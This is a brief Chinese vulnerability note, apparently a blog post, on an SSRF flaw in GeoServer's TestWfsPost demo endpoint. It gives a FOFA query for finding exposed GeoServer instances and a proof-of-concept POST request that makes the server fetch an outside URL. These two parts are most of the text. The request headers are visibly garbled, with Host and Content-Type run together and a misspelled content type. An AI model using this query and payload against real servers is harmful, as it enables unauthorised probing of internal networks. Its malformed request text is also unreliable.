共计 334 个字符,预计需要花费 1 分钟才能阅读完成。
漏洞概述
源于产品在未设置代理基础URL时候,可以通过Demo请求端点实现服务端请求伪造(SSRF),可以嗅探内网数据。
搜索引擎
FOFA:
app="GeoServer"
漏洞复现
POC
POST /geoserver/TestWfsPost HTTP/1.1
HostContent-Type:application/x-www-fofm-urlencoded
User-Agent: Mozilla/5.0-(windows NT 10.8; ·Win64; x64)-ApplewebKit/537.36 (KHTML, like Gecko)-chrome/137.0.0.0safari/537.36
url=http%3A%2F%2Fizexempcwx.dgrh3.cn&body=123正文完
